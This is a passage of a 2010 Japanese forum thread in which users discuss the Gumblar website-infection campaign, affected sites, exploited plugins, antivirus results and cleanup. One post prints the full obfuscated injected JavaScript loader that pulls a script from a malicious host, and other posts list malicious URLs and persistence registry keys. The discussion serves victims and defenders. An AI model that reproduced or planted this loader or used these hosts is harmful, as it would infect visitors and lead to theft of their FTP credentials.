でもnorton先生が止めてくれた
325 名前：名無しさん＠お腹いっぱい。 [2010/01/05(火) 16:26:02 ]: 何かうちのport2049から某RSSサーバにやたらリクエストが送られてるんだが、このウィルス？
326 名前：名無しさん＠お腹いっぱい。 [2010/01/05(火) 17:04:33 ]: ブラウザのRSS機能なんじゃね？
327 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 17:17:53 ]: そこまでわかっててGeno疑うってどういう知識の偏り方なのか疑問だ
328 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 17:34:35 ]: ヤフートップｷﾀ━━━━(ﾟ∀ﾟ)━━━━!!!!
329 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 19:19:24 ]: 今日の夕刊読売新聞ガンブラー記事一面
ホンダもやられてたのね
330 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 19:43:16 ]: >ホンダもやられてたのね
何をいまさら…。

JR東日本 ttp://www.jreast.co.jp/apology/20091223_restart.html
本田技研 ttp://www.honda.co.jp/oshirase/
モロゾフ ttp://www.morozoff.co.jp/_cms_/news_item/detail/item00085.html
信越放送 ttp://www.sbc21.co.jp/notice/notice091227.html
デジタルマガジン ttp://digimaga.net/2009/12/about-infection-to-the-gumblar-virus.html
アニたまどっとコム(ラジオ関西) 告知消失
331 名前：名無しさん＠お腹いっぱい。 [2010/01/05(火) 23:02:13 ]: エロサイト徘徊している俺は確実にアウトなんだろうな・・・・・・
AVGフリー、Ad-Aware、spybotしか使っていない俺はどうしたらいいのでしょうか？
332 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 23:24:03 ]: AVGフリーでも反応するぞ
333 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 23:35:19 ]: 精度は決して高くはないがフリーならまだavastの方がいいぞ
334 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 23:46:07 ]: 蔓延具合やばいな
次は辻ブログか
どこまで感染が広まるやら
335 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 23:58:58 ]: win.jpgって63バイトなんだけど、
これで感染させることができるの？
336 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 00:28:27 ]: エスパーさんは先程お眠りになられました
337 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 02:21:35 ]: >>335
無理。つかwin.jpgは関係ない。
338 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 02:47:02 ]: 嘘言うなよ
分からないなら黙ってろ
339 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 03:15:52 ]: /*GNU GPL*/のスクリプト解読してみたけどさ
解読して出てきたURL先のものをjavascriptだぞと
というのは記述してるわけ

で今のウィルスってjavascriptで読み込ませたとしても
悪さするプログラムって実行できるわけ？
そもそも勝手なプログラムの実行はvistaだと防げるわけだし

やっぱりアドビの0-dayでアップデートに紛れ込んで
FTPを盗むプログラムを実行したと思われる
だから今のところ/*GNU GPL*/のスクリプト読んでも無害なんじゃね

詳しい人どう思う？
340 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 03:18:45 ]: >>334
頭のjsがやられてるからハロプロ全体のような希ガス
tp://knnn4321●chips●jp/js/prototype●js
↓
/*GNU GPL*/ try{window.onload
341 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 03:22:02 ]: >悪さするプログラムって実行できるわけ？
それが出来ちゃう脆弱性を利用してるわけ
vistaでも実行は可能だがUACオンだとスタートアップに登録可能かどうかは知らない
342 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 03:24:46 ]: それに例えスタートアップに登録できなくても
実行できちゃえば
再起動までは攻撃は有効だと思う
343 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 03:26:03 ]: >>339
というか基本的なことを分かってない
このスレ読んだだけでももう少し分かるだろ
344 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 03:35:39 ]: >>339
何度も言われていると思うが
モロゾフのやつは
Microsoft Video ActiveX コントロールの脆弱性
Adobe Reader/Acrobatの脆弱性
Sun Javaの脆弱性
の三つの脆弱性のどれかが使われる
345 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 03:46:29 ]: つまり/*GNU GPL*/を読み込むと
Microsoft Video ActiveX コントロールの脆弱性
Adobe Reader/Acrobatの脆弱性
Sun Javaの脆弱性
このどれかをついてプログラムが実行されちゃうってこと？
346 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 03:48:34 ]: そういうこと
347 名前：名無しさん＠お腹いっぱい。 [2010/01/06(水) 05:27:59 ]: >>335,337
win.jpgは脆弱性を突いてクラッシュさせるのが役目で、そいつだけじゃ感染しない。
そいつを読み込ませるJavaScript側でshellコードを生成し、メモリー内にまき散らしておいて
クラッシュ -> shellコード実行 -> ウイルス本体召喚 -> ざまあ！
348 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 09:31:04 ]: ってかさ、AVG、Avast、MSEssentialsって入れると互いに競合しないの？
一時のAd-AwareとSpyBotみたいに
ウイルスソフトって入れまくってもいいの？
349 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 09:37:53 ]: Avast+MSEは競合しないよ
pc11.2ch.net/test/read.cgi/sec/1261930389/357-375
350 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 10:09:14 ]: 俺AVGツールバーってのインストールしてるんだけど、これの安全性：完全ってサイト使ってれば大丈夫なんだろうか？
今回のGumblarってXXSだろうけど、となるとツールバーに危険と表示される間もなくホンダなどのサイトでは安全性：完全ってなるんだろうか？
ホンダとか感染したサイト行く勇気は無いんですが、このツールバーでGumblarを予防できるものなんでしょうか？
もし出来なきゃこのツールバーなんの意味があるのかなと思ったりもしますが・・・
351 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 10:39:55 ]: Java Runtime Environmentて別に使わなかったらアンインストールしたほうほうが無難？
352 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 11:44:08 ]: 昨日深夜に
adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080/pics/win.jpg
からの侵入をノートンが遮断したログが残ってるんですけどこれってなに？
2chを閲覧してたら誘導されたってことかな？
353 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 11:48:11 ]: 今のところ個人のサイトやブログでは見つかってないんだね。
自分のブログも一応、確認しよう・・・
354 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 11:49:57 ]: >>352

>>1よめ
355 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 11:59:40 ]: >354
twintailが
HTTP MS MPEG2TuneRequestControl ActiveX BO 2 をと書いてあったので
2chの閲覧が原因かと思ったのですがね。
356 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 12:03:00 ]: 2日前に踏んだのを、TELNETで入って解析してみたら

sciencedirect-com.lequipe.fr.gamestop-com.superore●ru:8080/verycd.com/verycd.com/google.com/zaobao.com/rakuten.co.jp/

を経由して

ks369871●kimsufi●com:8080

から.jsファイルをダウンロードしようとしていた。だた、このファイルがダウンロードできなかったので助かったようだ。
357 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 12:09:43 ]: pdfはレポートとかで使うからなー消したいのに消せないもどかしさ
358 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 12:16:57 ]: >>352
そのURLはこのスレの76で直リンされてて
俺の場合、専ブラで画像を自動サムネイルするようにしてるので
専ブラがアクセスしたらAvastのネットワークシールドが遮断した
359 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 12:21:16 ]: >>358
76を見ただけでノートンが遮断しました。
原因が解ってほっとしました。　有り難うございます。
360 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 12:24:38 ]: >>356
507 名前：名無しさん＠お腹いっぱい。投稿日：2010/01/05(火) 00:45:49 ID:zAbuPfRw0
砂箱に入れたFirefoxからFirebugで色々見てみたけど
呼び出される本体のjsファイルがNot foundで発火しないね

508 名前：名無しさん＠お腹いっぱい。投稿日：2010/01/05(火) 00:55:20 ID:qZhWCv8d0
アクセス制御で2回目以降は404を装う。

509 名前：名無しさん＠お腹いっぱい。投稿日：2010/01/05(火) 01:13:20 ID:zAbuPfRw0
串さしてやったら死んだわ・・・
やばいな
361 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 12:30:38 ]: >>360
まじかー！
362 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 12:55:38 ]: 76の攻撃側のアドレスって侵入を試みる度に変わるねえ。
363 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 13:09:00 ]: >>361
gumblarの頃からそういうアクセス制御は入ってるよ。
gumblar.xでは2段構成のうちリダイレクト先(ウイルスばら撒き側)は
陥落サイト群の中からPHPが動作しているサイトが選別されていた。
364 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 13:47:15 ]: win.jpg
www.virustotal.com/jp/analisis/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4-1262708521
対応済み：Avira・Kaspersky・McAfee・NOD32・Panda・Symantec etc

JavaGame.jar
www.virustotal.com/jp/analisis/64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921-1262708821
対応済み：Avira・MSE・Symantec・TrendMicro etc
365 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 14:27:45 ]: gumblarに犯されている情報の、最新のサイト名（リンクは要らないです）誰か教えてくれませんか？
366 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 14:31:16 ]: 対策ソフトを集めてマルウェアの性能テストをしている者です。
PC雑誌の熟読には自信があります。

>通称GENOウイルスに強いかどうか、

ええ、強い方ですけど。

基本的にGENOだろうと何だろうと今はもう何らかの悪意を持つプログラムや
スクリプトを総称してマルウェアと呼んでいます。昔からの名残で説明の便宜上
使うとかその程度の意味しかないです。

私のこれまでの経験から言うとすれば、Kaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。
367 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 14:43:37 ]: 釣り針でかすぎるぞｗ
368 名前：名無しさん＠お腹いっぱい。 [2010/01/06(水) 14:48:07 ]: Heur.Win32.Generic.v
て言うウイルスが２回も・・・・
369 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 15:17:31 ]: 大規模流行は大手どこならどこも対応するからどれでも一緒だよ。
370 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 16:34:22 ]: >>364
対応早くなったかな？
371 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 16:47:36 ]: 「拡張子ではなく、内容によってファイルを開く」という設定がIEでは標準有効だからなぁ・・・
372 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 16:50:25 ]: 変えればいいだけ
373 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 16:52:12 ]: なにまた火狐野郎がなんかいっちゃてんのか
374 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 16:57:39 ]: あたいはopera使いちゃん！
375 名前：名無しさん＠お腹いっぱい。 [2010/01/06(水) 18:17:46 ]: tsushima.2ch.net/test/read.cgi/news/1262766483/
376 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 18:41:26 ]: VirtuaBoxにインストールしたWindows XP SP3でwin.jpgを踏んだら
いつの間にか悪名高いSecurity Toolがインストールされてたｗ
もう少し遊んでみよう
377 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 18:55:34 ]: >>364
avast!はコード自体をwebシールドで弾くから無問題。
378 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 19:36:16 ]: Firefox更新きたな
379 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 19:39:00 ]: しらん
380 名前：名無しさん＠お腹いっぱい。 [2010/01/06(水) 19:54:30 ]: <script>
/*GNU GPL*/
try{window.onload = function(){var U26gcel3nnek = document.createElement('s@$$&c)$&r$i#(p#$!t!!('.replace(/@|\)|\!|$|\^|\$|&|#/ig, ''));
var Zavq7z4z78k = 'Imrp1rhevfo';
U26gcel3nnek.setAttribute('type', 't(^$e&@&x!!$t!@&/)j((a)v&&a@(^s(!c((r!i$!p!$t!(#'.replace(/\^|#|&|\!|\(|\$|$|@/ig, ''));
U26gcel3nnek.setAttribute('src', 'h())&t)t$$p@#:)^$)/((^/!$#g!o(&&u^^^g!$o？u!-$&c!)!o)^$$m)@!^.$(#n&)$i
#(n^#^g@.&@c&$#o@m(.)a###!c#(e!$$(r$$-^#c!@o)@!$m@.$^s)(u!@p$$e@r@(a(g(@^u)$&)!i#d!e&!!#.!@^r(^u^:)
#8&^#&0#(8)^0^/!!#i@$)#n^$@$.&!)!c&!(o((!m$&&/$i#!$n#!).)$@c#(^o@!$&m(@/@$g@o))o^&g@&l!#e!.^)c))o@
m#&@/$^#v#)i!)#d!^@e&)$)o@)!@@s#z$(.？^c@!$o!m(^^/@b^(&e#!@&s@((t)#$@#t&^)^u&b!(e^)c$^#l!@)i$)&!$p)
@s!$^$(.&$c@&)@o)!$m(^#&/('.replace(/\!|@|#|\$|$|&|\^|$/ig, ''));
U26gcel3nnek.setAttribute('defer', 'd!$@$e@f!!(&(e^r@)'.replace(/@|$|\$|#|\!|$|\^|&/ig, ''));
U26gcel3nnek.setAttribute('id', 'M$e!$7#!)r#!$l？@^9()!(#t$!^9&q#)@$$b&&^!3&@)'.replace(/\^|\)|@|&|\$|\!|\(|#/ig, ''));
document.body.appendChild(U26gcel3nnek);}}
catch(Lpmpa57y1j) {}
</script>
381 名前：sage ◆sage/xLnlI [2010/01/06(水) 19:59:26 ]: 思いっきり踏みました
382 名前：sage ◆sage/xLnlI [2010/01/06(水) 20:05:47 ]: up3.viploader.net/ippan/src/vlippan053227.png
ソース

どちらさまかWindows7の感染確認方法を教えていただける方はいらっしゃいませんでしょうか
383 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 20:06:30 ]: MSに電話白や
384 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 20:07:49 ]: >>360
これって、もしかして同じLANから見たら、一人目しか感染しないってことか？
385 名前：名無しさん＠お腹いっぱい。 [2010/01/06(水) 20:18:27 ]: GENOウイルス感染　ローソン
tsushima.2ch.net/test/read.cgi/news/1262766483/l50
386 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 21:22:22 ]: >>382
んなもんないからとっととOSいれなおせ
387 名前：sage ◆sage/xLnlI [2010/01/06(水) 21:24:34 ]: >>386
えっ

いまノートン先生が0v3exclv.exeを削除してくれました
388 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 21:26:09 ]: やっぱりUACはスルーするのか
389 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 21:44:36 ]: >>387
それだけかどうかわからないよ
390 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 22:40:20 ]: 京王電鉄ＨＰも改ざん被害　ウイルス「ガンブラー」
tsushima.2ch.net/test/read.cgi/news/1262784863/
391 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 22:52:56 ]: >>387
firefoxにはnoscript入れてなかったの？
それとも入れた結果がこれだyoってこと？
392 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 23:19:00 ]: UACスルーってマジかよ、何のための暗転だよ
393 名前：名無しさん＠お腹いっぱい。 [2010/01/06(水) 23:19:53 ]: pc11.2ch.net/test/read.cgi/pc/1261006089/
394 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 23:23:15 ]: 海外ではあんま騒いでないよな
なんだこの差は
395 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 23:31:25 ]: >>394
"セキュリティツール"の画面が出てくるって騒ぎになっていると聞いたような。
具体的な場所は分からないけど。
396 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 23:40:22 ]: これ、もしかして制限ユーザだと全く感染しない？
397 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 00:26:16 ]: >>395
Security Toolな。
これも改ざんされたサイトを閲覧して、脆弱性を利用して感染するらしい
398 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 00:37:14 ]: サイト www.spacecraft.co.jp/home.html の調査結果
検出されたウイルス（ワーム、スパイウエア）
Trojan-Downloader.JS.Agent.ewh
399 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 00:44:56 ]: >>398
そのウィルスはつい最近まで、GDATAの誤検出だとずっと思ってた。
400 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 00:46:38 ]: ↓↓↓
ｈttps://www●global2j-education●com/contact
↑↑↑

ｈttpsが、、、
401 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 00:49:02 ]: 世界中のHTMLのソースコードを検索できたら回避できるのにね
グーグル辺りがやってくれないかな・・・・
402 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 00:49:40 ]: ＦＴＰがやられるんだからｈttpsとか関係ないよ
403 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 00:56:28 ]: 32 名前：すり鉢(アラバマ州) 投稿日： 2010/01/07(木) 00:45:39.79 ID:RXPRsCkB
p://www●spacecraft●co●jp/home●html
スペースクラフトグループ
神田うの、黒谷友香、栗山千明、岩田さゆり、青山倫子、宇浦冴香、等が所属。

ガンブラーｷﾀ━(ﾟ∀ﾟ)━!!
404 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 01:21:53 ]: 私は対策ソフトを集めてマルウェアの性能テストなどをしています。
PC雑誌の熟読には自信があります。

あなた方には高度な話になりますが、最近のクラッカーは対策ソフトの
利用を予め想定していて、これを回避するようにいろいろ画策してきます。
今ではアンチウイルスの回避なんて簡単にできるようになっていますし、
Personal Firewallもバイパスできる場合も結構あります。

ここの閲覧者の方々も含めて申しますけど、ここ最近は対策ソフト
回避技術が非常に進歩してきましたので、機関系テストでNo.1の
ソフトだからとかそんな簡単な話ではなくなっています。

私の豊富なテストと経験からすればKaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。
405 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 01:27:05 ]: コピペ乙
406 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 01:45:25 ]: 年明けにgoonetの輸入車ページ見てたらなんか変になったけど大丈夫だったのかな…
407 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 01:52:47 ]: 民主党サイトが年末から年始にかけて改ざん - 政治的意図なし
カゴヤのホスティングサーバが不正アクセス被害 - ウェブアプリの脆弱性狙われる
関連7サイトが改ざん被害、閲覧でウイルス感染のおそれ - 出版文化社
通販サイトなど運営する3サイトで改ざんが発生 - 岐阜の恵那バッテリー電装
408 名前：名無しさん＠お腹いっぱい。 [2010/01/07(木) 01:59:19 ]: 詳しくない者だが、経緯を書いておく。

年末にあるサイトを見たら、瞬間的にいくつ窓が開き、Acrobat6が自動起動。
そして固まる。PCを強制再起動。

再起動すると、Antivirに反応するファイルがゾロゾロすごい数でてくる。名前
はまともらしいが、ほぼすべて削除。いくつかもらしたかも。

次の日に再起動しても、また反応ファイルがぞろぞろ。このあたりで難しいウイルス
かも？と気がついて、とにかく反応するものをすべて削除。TV番組表自動取得
のためのものも、削除してしまった。

その後、スキャンにひっかかるものはテンポラリファイルにある実行ファイル
だけになる。簡単に削除。しかし、siszyd32.exeについては「ファイルが開けない」
という警告のみでる。一旦安心。
409 名前：名無しさん＠お腹いっぱい。 [2010/01/07(木) 02:00:40 ]: Spybotでも、siszyd32.exeはひっかからず。WEBで調べてヤバそうなものだと
判明するが、ファイル本体がどうしても見えない。隠しファイルを表示にしても、
見えない。ただ、存在が指摘されたフォルダで、
siszyd32.exeフォルダを作成するとできないことから、やはり存在する
ことが判明。

ググッてみたけれど、有効策が見つからず。レジストリの中に見つからず、
カスペのフリーツールはデータベースが壊れていると出てつかえなかった。
また、何もしていなくてもCPU使用率が５０％になっていることに気がついた。
不審なプログラム、プロセスは自分の知識ではみあたらず。

今日になって、いろいろ削除方法を探してみたところ、セーフモードで起動
するとうまく削除できるらしいので、試してみた。すると、
\プログラム\スタートアップ\siszyd32.exe　が何もしなくてもはっきり
見えていたので、削除して再起動したところ、CPU使用率が５％くらいに
落ちた。多分、解決。

今は、siszyd32.exeがCPUをあんなに使用して何をしていたのかが気になって
いる。サイトの運営はしていないが、どうしたらいいものか・・・。ヤフー
とかのパスを変更した方がいいのかな。
410 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 02:11:16 ]: >>409
OSのクリーンインストールを薦める
面倒だとは思うが、やっておいたほうが絶対にいいぞ
411 名前：名無しさん＠お腹いっぱい。 [2010/01/07(木) 02:19:00 ]: >410 ありがとう。でも、忙しくて。XPなんで、クリーンインストール
するくらいなら、新しいPCを７で自作しようか検討中。

自分はウイルスやファイアーウォールに詳しくないので、これを機に勉強
しようと思ってます。

今回のウイルスは８，９年くらい前に大流行したウイルスを思い起こさせ
ますね。これを機にセキュリーティーが強化されたはずなのに、こんなに
あっさり感染するとは・・・。WEBを見ただけで感染というのは問題が
ありすぎる。自分の周りはもっとPCに疎い人ばかりなので、明日は職場で
大変だ。
412 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 02:23:37 ]: 水面下への広がりと応用力を考慮すると、まだ氷山の一角に過ぎず
ネット史上最悪のウィルスとなり得る可能性があるな
事の始まりは去年の春辺りだったか
そこから、表面上に出てくるまで一気に広がり始めた印象
413 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 02:25:23 ]: /*GNU GPL*/ 感染サイトを見る
↓
Adobe Readerを最新版に更新してないと
脆弱性をつかれてウィルス実行される
↓
FTPのID、パスがあれば盗まれる
というか盗んで送信するプログラムが常駐される
↓
盗まれたFTPのID、パスでサイトを改ざん
↓
ループ
414 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 02:27:22 ]: GNU GPLに関しては、Adobe Readerを入れてなければ感染は防げるとみていいのかな？
415 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 02:28:59 ]: Adobe Readerだけじゃないよ
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2108
416 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 02:34:46 ]: 基本、JSは信頼サイト以外は止めてるが･･･大手の有名サイトでも感染する事があるから100%安全じゃないだろうな
未知のセキュリティホールを突かれない事を祈るばかり
417 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 02:39:08 ]: > 未知のセキュリティホールを突かれない事を祈るばかり

それを考えるとHIPS入れておく方がいいのかね
418 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 02:41:37 ]: こんなに多くのサイトがやられるんじゃ
市販のウィルスソフトなんか役に立たないと
ばれちゃうなｗ
419 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 02:43:24 ]: ウイルス対策ソフトは検体が無いと対策は取れないからねえ
まあ、これは現実世界のウイルスでも同じだけど
420 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 02:48:17 ]: UAC→スルー？？
ウィルスソフト→定義更新が間に合わない
各ソフトウェアを最新の状態にしておく→現状ではこれが無難
javascriptを無効化する→ブラウジングに支障が出る

頻繁にブラウジングする立場（様々なオンラインショップで購入したりもする）としては若干怖い
421 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 02:56:00 ]: バックアップとれば万が一の時はクリーンインスコで済むから現実のウィルスほど
脅威には感じないけどね（仕事関連は別だけど）
422 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 03:08:47 ]: 専ブラで2chだけを見るネット生活を送るのがベストか
423 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 03:23:21 ]: ガンプラでジオマラでも作ってろチンカスｗ
424 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 03:30:33 ]: そういや専ブラの脆弱性発見ってのも以前あったよな・・・
まあ日本をピンポイントに突いてくる奴しか見つけても使わないだろうけどｗ
専ブラによっちゃIEの脆弱性の影響受ける奴あるのかな？

>>376,395,397
Security Toolに関してはこれだね
ttp://blogs.yahoo.co.jp/noooo_spam/59325476.html
ttp://blogs.yahoo.co.jp/noooo_spam/59347678.html

8080のスクリプトがこいつらに変わってるとこもあるとか
8080を操ってる奴らは、裏市場でボットネットみたいな販売方法使って儲け始めたんだろうか？
425 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 03:40:01 ]: うちはLive2chだからIEエンジンを使うけどIE自体を凍結しているから実害はないかな
426 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 03:43:34 ]: 9999999円あなたはどしますか？
tp://117117●fc2web●com/

これはGNU GPLぐっじょぶw･･で宜しいのかな？
427 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 04:57:05 ]: 感染すると以下の二つが登録される

C:\Documents and Settings\ユーザー名\スタートメニュー\プログラム\siszyd32.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
428 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 06:50:12 ]: そこは固定じゃない。バイナリはコロコロ変わる。
429 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 07:15:07 ]: ころころなんて変わらないよ
430 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 07:19:11 ]: モロゾフなどが感染した今流行のやつはそれだろ
新たな違う攻撃なら変わるだろうけど
コロコロ変わったところは確認してない
431 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 07:35:14 ]: >>428
どう変わった？
432 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 07:39:51 ]: GENOの頃はVistaは安全だったのに、もうVistaでも関係ないんだな。
433 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 07:40:00 ]: モロゾフのタイプは>>427であってる
ころころ変わるのは別物
434 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 07:40:43 ]: 感染しているのはupdateを怠ってる人達だがね
435 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 09:08:47 ]: updateを怠ってるなんて出来るの？
終了時に強制的にupdateされない？
436 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 09:18:24 ]: flashとかがか
今の段階でそんなこといってたらそら引っかかるわ
437 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 09:54:17 ]: >>384
俺もそれ知りたい。

月曜の晩、俺のPCでNOD32が8080系を検知したサイトを、奥さんが別PCで見ちゃったの。ウィスルセキュリティーZEROはスルー。
でも、どんなに調べても感染の形跡がないのさ。
その後、各社（Macfee,NOD2,MSE,Kasper）の全スキャンにも引っかからず、netstat -a で見てももどこにもつなぎに行ってない。
Windows XPは Windows Updateで最新状態だったが、Acrobatは8だったのに。

で、>>356や>>360を見て、もしかしてNOD32は改竄されたHTMLの<script>の文字列パターンや .ru:8080 のサイト名ではなく、
その次の .jsファイルのダウンロードの時点で検知・遮断するのかなと。
すると、次に奥さんが別PCで見ても.jsファイルがNOT FOUNDなら感染しなかったのも合点がいくんだなぁ。

いずれにしても早く、明確な感染確認の方法が出てくれればありがたい。
いっそFFFTPをインストールして、自前サイトのID/PWでもセットしておくかなw
438 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 11:08:43 ]: Spybot、Ad-Aware、Avast、MSEssentialsの４つをインストール（常駐）＋MSの悪意のある～を使ってますが、こういうフリーのソフトで固めてもGumblarは防げないのでしょうか？
439 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 11:11:20 ]: だから穴の前のついたてを選んでないで
さっさと穴埋めとけ
440 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 11:19:50 ]: 今、一番いいセキュリティソフトスレに行こうとしたらAvastがトロイの木馬を発見した
一応未然に防いで削除（移動）出来たようだけど、ほんとに大丈夫なのかな？
たった今１日がかりでWindowsのクリーンインストールしたばっかなんだけど
441 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 11:24:53 ]: やっぱ2chは怖いね
どのスレだったかCファイル破壊コードとか書かれていたし
442 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 11:24:59 ]: ふーん
443 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 11:34:36 ]: >>442のような人間が仕込んでるんだろうなｗ
444 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 11:41:22 ]: また馬鹿キャラプレイしてるのか
445 名前：名無しさん＠お腹いっぱい。 [2010/01/07(木) 11:47:30 ]: cファイル破壊コードって何なのさ？
